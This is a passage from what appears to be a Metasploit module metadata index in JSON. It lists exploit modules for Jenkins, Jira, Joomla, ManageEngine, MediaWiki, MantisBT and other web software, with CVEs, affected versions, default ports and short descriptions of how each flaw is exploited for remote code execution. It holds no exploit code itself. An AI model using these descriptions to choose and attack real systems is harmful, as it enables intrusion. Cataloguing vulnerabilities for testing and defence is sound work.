"rank": 400,
"disclosure_date": "2013-01-18",
"type": "exploit",
"author": [
"Spencer McIntyre",
"jamcut",
"thesubtlety"
],
"description": "This module uses the Jenkins-CI Groovy script console to execute\n OS commands using Java.",
"references": [
"URL-https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console"
],
"platform": "Linux,Unix,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows",
"Linux",
"Unix CMD"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/multi/http/jenkins_script_console.rb",
"is_install_path": true,
"ref_name": "multi/http/jenkins_script_console",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_multi/http/jenkins_xstream_deserialize": {
"name": "Jenkins XStream Groovy classpath Deserialization Vulnerability",
"full_name": "exploit/multi/http/jenkins_xstream_deserialize",
"rank": 600,
"disclosure_date": "2016-02-24",
"type": "exploit",
"author": [
"Arshan Dabirsiaghi",
"Matt Byrne <attackdebris@gmail.com>"
],
"description": "This module exploits CVE-2016-0792 a vulnerability in Jenkins versions older than 1.650 and Jenkins LTS versions\n older than 1.642.2 which is caused by unsafe deserialization in XStream with Groovy in the classpath,\n which allows remote arbitrary code execution. The issue affects default installations. Authentication\n is not required to exploit the vulnerability.",
"references": [
"CVE-2016-0792",
"URL-https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream",
"URL-https://wiki.jenkins.io/pages/viewpage.action?pageId=95585413"
],
"platform": "Linux,Unix,Windows",
"arch": "cmd, python, x86, x64",
"rport": "8080",
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix (In-Memory)",
"Python (In-Memory)",
"PowerShell (In-Memory)",
"Windows (CMD)",
"Linux (Dropper)",
"Windows (Dropper)"
],
"mod_time": "2018-02-26 16:59:36 +0000",
"path": "/modules/exploits/multi/http/jenkins_xstream_deserialize.rb",
"is_install_path": true,
"ref_name": "multi/http/jenkins_xstream_deserialize",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/jira_hipchat_template": {
"name": "Atlassian HipChat for Jira Plugin Velocity Template Injection",
"full_name": "exploit/multi/http/jira_hipchat_template",
"rank": 600,
"disclosure_date": "2015-10-28",
"type": "exploit",
"author": [
"Chris Wood",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "Atlassian Hipchat is a web service for internal instant messaging. A plugin is available\n for Jira that allows team collaboration at real time. A message can be used to inject Java\n code into a Velocity template, and gain code execution as Jira. Authentication is required\n to exploit this vulnerability, and you must make sure the account you're using isn't\n protected by captcha. By default, Java payload will be used because it is cross-platform,\n but you can also specify which native payload you want (Linux or Windows).\n\n HipChat for Jira plugin versions between 1.3.2 and 6.30.0 are affected. Jira versions\n between 6.3.5 and 6.4.10 are also affected by default, because they were bundled with\n a vulnerable copy of HipChat.\n\n When using the check command, if you supply a valid username and password, the module\n will be able to trigger the bug and check more accurately. If not, it falls back to\n passive, which can only tell if the target is running on a Jira version that is bundled\n with a vulnerable copy of Hipchat by default, which is less reliable.\n\n This vulnerability was originally discovered internally by Atlassian.",
"references": [
"CVE-2015-5603",
"EDB-38551",
"BID-76698",
"URL-https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HipChat for Jira plugin on Java",
"HipChat for Jira plugin on Windows",
"HipChat for Jira plugin on Linux"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/multi/http/jira_hipchat_template.rb",
"is_install_path": true,
"ref_name": "multi/http/jira_hipchat_template",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/jira_plugin_upload": {
"name": "Atlassian Jira Authenticated Upload Code Execution",
"full_name": "exploit/multi/http/jira_plugin_upload",
"rank": 600,
"disclosure_date": "2018-02-22",
"type": "exploit",
"author": [
"Alexander Gonzalez(dubfr33)"
],
"description": "This module can be used to execute a payload on Atlassian Jira via\n the Universal Plugin Manager(UPM). The module requires valid login\n credentials to an account that has access to the plugin manager.\n The payload is uploaded as a JAR archive containing a servlet using\n a POST request against the UPM component. The check command will\n test the validity of user supplied credentials and test for access\n to the plugin manager.",
"references": [
"URL-https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-windows-system/",
"URL-https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-linux-or-mac-system/",
"URL-https://developer.atlassian.com/server/framework/atlassian-sdk/create-a-helloworld-plugin-project/"
],
"platform": "Java",
"arch": "",
"rport": 2990,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java Universal"
],
"mod_time": "2019-04-26 11:09:33 +0000",
"path": "/modules/exploits/multi/http/jira_plugin_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/jira_plugin_upload",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/joomla_http_header_rce": {
"name": "Joomla HTTP Header Unauthenticated Remote Code Execution",
"full_name": "exploit/multi/http/joomla_http_header_rce",
"rank": 600,
"disclosure_date": "2015-12-14",
"type": "exploit",
"author": [
"Marc-Alexandre Montpas",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5.\n By storing user supplied headers in the databases session table it's possible to truncate the input\n by sending an UTF-8 character. The custom created payload is then executed once the session is read\n from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13.\n In later versions the deserialisation of invalid session data stops on the first error and the\n exploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and\n 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.",
"references": [
"CVE-2015-8562",
"EDB-38977",
"EDB-39033",
"URL-https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html",
"URL-https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html",
"URL-https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html",
"URL-https://blog.patrolserver.com/2015/12/17/in-depth-analyses-of-the-joomla-0-day-user-agent-exploit/",
"URL-https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330",
"URL-https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html",
"URL-https://bugs.php.net/bug.php?id=70219"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Joomla 1.5.0 - 3.4.5"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/http/joomla_http_header_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/joomla_http_header_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/kordil_edms_upload_exec": {
"name": "Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability",
"full_name": "exploit/multi/http/kordil_edms_upload_exec",
"rank": 600,
"disclosure_date": "2013-02-22",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in Kordil EDMS v2.2.60rc3.\n This application has an upload feature that allows an unauthenticated user\n to upload arbitrary files to the '/kordil_edms/userpictures/' directory.",
"references": [
"OSVDB-90645",
"EDB-24547"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/http/kordil_edms_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/kordil_edms_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/lcms_php_exec": {
"name": "LotusCMS 3.0 eval() Remote Command Execution",
"full_name": "exploit/multi/http/lcms_php_exec",
"rank": 600,
"disclosure_date": "2011-03-03",
"type": "exploit",
"author": [
"dflah_ <dflah_@alligatorteam.org>",
"sherl0ck_ <sherl0ck_@alligatorteam.org>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Lotus CMS 3.0's Router()\n function. This is done by embedding PHP code in the 'page' parameter,\n which will be passed to a eval call, therefore allowing remote code execution.\n\n The module can either automatically pick up a 'page' parameter from the\n default page, or manually specify one in the URI option. To use the automatic\n method, please supply the URI with just a directory path, for example: \"/lcms/\".\n To manually configure one, you may do: \"/lcms/somepath/index.php?page=index\"",
"references": [
"CVE-2011-0518",
"OSVDB-75095",
"URL-http://secunia.com/secunia_research/2011-21/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic LotusCMS 3.0"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/multi/http/lcms_php_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/lcms_php_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/log1cms_ajax_create_folder": {
"name": "Log1 CMS writeInfo() PHP Code Injection",
"full_name": "exploit/multi/http/log1cms_ajax_create_folder",
"rank": 600,
"disclosure_date": "2011-04-11",
"type": "exploit",
"author": [
"EgiX",
"Adel SBM",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits the \"Ajax File and Image Manager\" component that can be\n found in log1 CMS. In function.base.php of this component, the 'data' parameter\n in writeInfo() allows any malicious user to have direct control of writing data\n to file data.php, which results in arbitrary remote code execution.",
"references": [
"CVE-2011-4825",
"OSVDB-76928",
"EDB-18075",
"EDB-18151"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"log1 CMS 2.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/log1cms_ajax_create_folder.rb",
"is_install_path": true,
"ref_name": "multi/http/log1cms_ajax_create_folder",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/magento_unserialize": {
"name": "Magento 2.0.6 Unserialize Remote Code Execution",
"full_name": "exploit/multi/http/magento_unserialize",
"rank": 600,
"disclosure_date": "2016-05-17",
"type": "exploit",
"author": [
"Netanel Rubin",
"agix",
"mr_me <mr_me@offensive-security.com>"
],
"description": "This module exploits a PHP object injection vulnerability in Magento 2.0.6\n or prior.",
"references": [
"CVE-2016-4010",
"EDB-39838",
"URL-http://netanelrub.in/2016/05/17/magento-unauthenticated-remote-code-execution/",
"URL-http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/",
"URL-https://magento.com/security/patches/magento-206-security-update"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/magento_unserialize.rb",
"is_install_path": true,
"ref_name": "multi/http/magento_unserialize",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/makoserver_cmd_exec": {
"name": "Mako Server v2.5, 2.6 OS Command Injection RCE",
"full_name": "exploit/multi/http/makoserver_cmd_exec",
"rank": 600,
"disclosure_date": "2017-09-03",
"type": "exploit",
"author": [
"John Page (hyp3rlinx) - Beyond Security SecuriTeam Secure Disclosure",
"Steven Patterson (Shogun Lab) <steven@shogunlab.com>"
],
"description": "This module exploits a vulnerability found in Mako Server v2.5, 2.6.\n It's possible to inject arbitrary OS commands in the Mako Server\n tutorial page through a PUT request to save.lsp.\n\n Attacker input will be saved on the victims machine and can\n be executed by sending a GET request to manage.lsp.",
"references": [
"EDB-42683",
"URL-https://blogs.securiteam.com/index.php/archives/3391"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Mako Server v2.5, 2.6"
],
"mod_time": "2017-11-15 15:00:47 +0000",
"path": "/modules/exploits/multi/http/makoserver_cmd_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/makoserver_cmd_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/manage_engine_dc_pmp_sqli": {
"name": "ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection",
"full_name": "exploit/multi/http/manage_engine_dc_pmp_sqli",
"rank": 600,
"disclosure_date": "2014-06-08",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits an unauthenticated blind SQL injection in LinkViewFetchServlet,\n which is exposed in ManageEngine Desktop Central v7 build 70200 to v9 build 90033 and\n Password Manager Pro v6 build 6500 to v7 build 7002 (including the MSP versions). The\n SQL injection can be used to achieve remote code execution as SYSTEM in Windows or as\n the user in Linux. This module exploits both PostgreSQL (newer builds) and MySQL (older\n or upgraded builds). MySQL targets are more reliable due to the use of relative paths;\n with PostgreSQL you should find the web root path via other means and specify it with\n WEB_ROOT.\n\n The injection is only exploitable via a GET request, which means that the payload\n has to be sent in chunks smaller than 8000 characters (URL size limitation). Small\n payloads and the use of exe-small is recommended, as you can only do between 10 and\n 20 injections before using up all the available ManagedConnections until the next\n server restart.\n\n This vulnerability exists in all versions released since 2006, however builds below\n DC v7 70200 and PMP v6 6500 do not ship with a JSP compiler. You can still try your\n luck using the MySQL targets as a JDK might be installed in the $PATH.",
"references": [
"CVE-2014-3996",
"OSVDB-110198",
"URL-https://seclists.org/fulldisclosure/2014/Aug/55"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": 8020,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Desktop Central v8 >= b80200 / v9 < b90039 (PostgreSQL) on Windows",
"Desktop Central MSP v8 >= b80200 / v9 < b90039 (PostgreSQL) on Windows",
"Desktop Central [MSP] v7 >= b70200 / v8 / v9 < b90039 (MySQL) on Windows",
"Password Manager Pro [MSP] v6 >= b6800 / v7 < b7003 (PostgreSQL) on Windows",
"Password Manager Pro v6 >= b6500 / v7 < b7003 (MySQL) on Windows",
"Password Manager Pro [MSP] v6 >= b6800 / v7 < b7003 (PostgreSQL) on Linux",
"Password Manager Pro v6 >= b6500 / v7 < b7003 (MySQL) on Linux"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb",
"is_install_path": true,
"ref_name": "multi/http/manage_engine_dc_pmp_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/manageengine_auth_upload": {
"name": "ManageEngine Multiple Products Authenticated File Upload",
"full_name": "exploit/multi/http/manageengine_auth_upload",
"rank": 600,
"disclosure_date": "2014-12-15",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk,\n AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that accepts\n the upload does not handle correctly '../' sequences, which can be abused to write\n to the file system. Authentication is needed to exploit this vulnerability, but this module\n will attempt to login using the default credentials for the administrator and guest\n accounts. Alternatively, you can provide a pre-authenticated cookie or a username / password.\n For IT360 targets, enter the RPORT of the ServiceDesk instance (usually 8400). All\n versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer,\n SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this\n module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has\n been tested successfully in Windows and Linux on several versions.",
"references": [
"CVE-2014-5301",
"OSVDB-116733",
"URL-https://seclists.org/fulldisclosure/2015/Jan/5"
],
"platform": "Java",
"arch": "java",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9",
"ServiceDesk Plus/Plus MSP v7.1 >= b7016 - v9.0 < b9031/AssetExplorer v5-v6.1",
"IT360 v8-v10.4"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/manageengine_auth_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/manageengine_auth_upload",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/manageengine_sd_uploader": {
"name": "ManageEngine ServiceDesk Plus Arbitrary File Upload",
"full_name": "exploit/multi/http/manageengine_sd_uploader",
"rank": 600,
"disclosure_date": "2015-08-20",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in ManageEngine ServiceDesk Plus.\n The vulnerability exists in the FileUploader servlet which accepts unauthenticated\n file uploads. This module has been tested successfully on versions v9 b9000 - b9102\n in Windows and Linux. The MSP versions do not expose the vulnerable servlet.",
"references": [
"ZDI-15-396 ",
"URL-https://github.com/rapid7/metasploit-framework/pull/6038"
],
"platform": "Java",
"arch": "java",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ServiceDesk Plus v9 b9000 - b9102 / Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/manageengine_sd_uploader.rb",
"is_install_path": true,
"ref_name": "multi/http/manageengine_sd_uploader",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/manageengine_search_sqli": {
"name": "ManageEngine Security Manager Plus 5.5 Build 5505 SQL Injection",
"full_name": "exploit/multi/http/manageengine_search_sqli",
"rank": 600,
"disclosure_date": "2012-10-18",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>",
"sinn3r <sinn3r@metasploit.com>",
"egypt <egypt@metasploit.com>"
],
"description": "This module exploits a SQL injection found in ManageEngine Security Manager Plus\n advanced search page, which results in remote code execution under the context of\n SYSTEM in Windows; or as the user in Linux. Authentication is not required in order\n to exploit this vulnerability.",
"references": [
"OSVDB-86562",
"EDB-22094",
"BID-56138"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 6262,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Windows",
"Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/manageengine_search_sqli.rb",
"is_install_path": true,
"ref_name": "multi/http/manageengine_search_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/mantisbt_manage_proj_page_rce": {
"name": "Mantis manage_proj_page PHP Code Execution",
"full_name": "exploit/multi/http/mantisbt_manage_proj_page_rce",
"rank": 600,
"disclosure_date": "2008-10-16",
"type": "exploit",
"author": [
"EgiX",
"Lars Sorenson"
],
"description": "Mantis v1.1.3 and earlier are vulnerable to a post-authentication Remote\n Code Execution vulnerability in the sort parameter of the\n manage_proj_page.php page.",
"references": [
"EDB-6768",
"CVE-2008-4687"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Mantis <= 1.1.3"
],
"mod_time": "2018-05-09 11:50:07 +0000",
"path": "/modules/exploits/multi/http/mantisbt_manage_proj_page_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/mantisbt_manage_proj_page_rce",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/mantisbt_php_exec": {
"name": "MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability",
"full_name": "exploit/multi/http/mantisbt_php_exec",
"rank": 500,
"disclosure_date": "2014-11-08",
"type": "exploit",
"author": [
"Egidio Romano",
"Juan Escobar <eng.jescobar@gmail.com>",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "This module exploits a post-auth vulnerability found in MantisBT versions 1.2.0a3 up to 1.2.17 when the Import/Export plugin is installed.\n The vulnerable code exists on plugins/XmlImportExport/ImportXml.php, which receives user input through the \"description\" field and the \"issuelink\" attribute of an uploaded XML file and passes to preg_replace() function with the /e modifier.\n This allows a remote authenticated attacker to execute arbitrary PHP code on the remote machine.\n This version also suffers from another issue. The import page is not checking the correct user level\n of the user, so it's possible to exploit this issue with any user including the anonymous one if enabled.",
"references": [
"CVE-2014-7146",
"CVE-2014-8598",
"URL-https://www.mantisbt.org/bugs/view.php?id=17725",
"URL-https://www.mantisbt.org/bugs/view.php?id=17780"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/mantisbt_php_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/mantisbt_php_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/mediawiki_syntaxhighlight": {
"name": "MediaWiki SyntaxHighlight extension option injection vulnerability",
"full_name": "exploit/multi/http/mediawiki_syntaxhighlight",
"rank": 400,
"disclosure_date": "2017-04-06",
"type": "exploit",
"author": [
"Yorick Koster"
],
"description": "This module exploits an option injection vulnerability in the SyntaxHighlight\n extension of MediaWiki. It tries to create & execute a PHP file in the document root.\n The USERNAME & PASSWORD options are only needed if the Wiki is configured as private.\n\n This vulnerability affects any MediaWiki installation with SyntaxHighlight version 2.0\n installed & enabled. This extension ships with the AIO package of MediaWiki version\n 1.27.x & 1.28.x. A fix for this issue is included in MediaWiki version 1.28.2 and\n version 1.27.3.",
"references": [
"CVE-2017-0372",
"URL-https://lists.wikimedia.org/pipermail/mediawiki-announce/2017-April/000207.html",
"URL-https://phabricator.wikimedia.org/T158689",
"URL-https://securify.nl/advisory/SFY20170201/syntaxhighlight_mediawiki_extension_allows_injection_of_arbitrary_pygments_options.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/multi/http/mediawiki_syntaxhighlight.rb",
"is_install_path": true,
"ref_name": "multi/http/mediawiki_syntaxhighlight",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/mediawiki_thumb": {
"name": "MediaWiki Thumb.php Remote Command Execution",
"full_name": "exploit/multi/http/mediawiki_thumb",
"rank": 600,
"disclosure_date": "2014-01-28",
"type": "exploit",
"author": [
"Netanel Rubin",
"Brandon Perry",
"Ben Harris",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,\n when DjVu or PDF file upload support is enabled, allows remote unauthenticated\n users to execute arbitrary commands via shell metacharacters. If no target file\n is specified this module will attempt to log in with the provided credentials to\n upload a file (.DjVu) to use for exploitation.",
"references": [
"CVE-2014-1610",
"OSVDB-102630",
"URL-http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html",
"URL-https://bugzilla.wikimedia.org/show_bug.cgi?id=60339"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic PHP-CLI",
"Linux CMD",
"Windows CMD"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/http/mediawiki_thumb.rb",
"is_install_path": true,
"ref_name": "multi/http/mediawiki_thumb",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/metasploit_static_secret_key_base": {
"name": "Metasploit Web UI Static secret_key_base Value",
"full_name": "exploit/multi/http/metasploit_static_secret_key_base",
"rank": 600,
"disclosure_date": "2016-09-15",
"type": "exploit",
"author": [
"Justin Steven",
"joernchen of Phenoelit <joernchen@phenoelit.de>"
],
"description": "This module exploits the Web UI for Metasploit Community, Express and\n Pro where one of a certain set of Weekly Releases have been applied.\n These Weekly Releases introduced a static secret_key_base value.\n Knowledge of the static secret_key_base value allows for\n deserialization of a crafted Ruby Object, achieving code execution.\n\n This module is based on\n exploits/multi/http/rails_secret_deserialization",
"references": [
"OVE-20160904-0002",
"URL-https://community.rapid7.com/community/metasploit/blog/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401",
"URL-https://github.com/justinsteven/advisories/blob/master/2016_metasploit_rce_static_key_deserialization.md"
],
"platform": "Ruby",
"arch": "ruby",
"rport": 3790,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/metasploit_static_secret_key_base.rb",
"is_install_path": true,
"ref_name": "multi/http/metasploit_static_secret_key_base",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/metasploit_webui_console_command_execution": {
"name": "Metasploit Web UI Diagnostic Console Command Execution",
"full_name": "exploit/multi/http/metasploit_webui_console_command_execution",
"rank": 600,
"disclosure_date": "2016-08-23",
"type": "exploit",
"author": [
"Justin Steven"
],
"description": "This module exploits the \"diagnostic console\" feature in the Metasploit\n Web UI to obtain a reverse shell.\n\n The diagnostic console is able to be enabled or disabled by an\n administrator on Metasploit Pro and by an authenticated user on\n Metasploit Express and Metasploit Community. When enabled, the\n diagnostic console provides access to msfconsole via the web interface.\n An authenticated user can then use the console to execute shell\n commands.\n\n NOTE: Valid credentials are required for this module.\n\n Tested against:\n\n Metasploit Community 4.1.0,\n Metasploit Community 4.8.2,\n Metasploit Community 4.12.0",
"references": [
],
"platform": "",
"arch": "cmd",
"rport": 3790,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix",
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/metasploit_webui_console_command_execution.rb",
"is_install_path": true,
"ref_name": "multi/http/metasploit_webui_console_command_execution",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/mma_backdoor_upload": {
"name": "Th3 MMA mma.php Backdoor Arbitrary File Upload",
"full_name": "exploit/multi/http/mma_backdoor_upload",
"rank": 600,
"disclosure_date": "2012-04-02",
"type": "exploit",
"author": [
"Jay Turla <@shipcod3>"
],
"description": "This module exploits Th3 MMA mma.php Backdoor which allows an arbitrary file upload that\n leads to arbitrary code execution. This backdoor also echoes the Linux kernel version or\n operating system version because of the php_uname() function.",
"references": [
"URL-http://blog.pages.kr/1307"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"mma file uploader"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/mma_backdoor_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/mma_backdoor_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/mobilecartly_upload_exec": {
"name": "MobileCartly 1.0 Arbitrary File Creation Vulnerability",
"full_name": "exploit/multi/http/mobilecartly_upload_exec",
"rank": 600,
"disclosure_date": "2012-08-10",
"type": "exploit",
"author": [
"Yakir Wizman <yakir.wizman@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in MobileCartly. The savepage.php file\n does not do any permission checks before using file_put_contents(), which\n allows any user to have direct control of that function to create files\n under the 'pages' directory by default, or anywhere else as long as the user\n has WRITE permission.",
"references": [
"OSVDB-85509",
"EDB-20422 ",
"BID-55399 "
],
"platform": "Linux,PHP",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
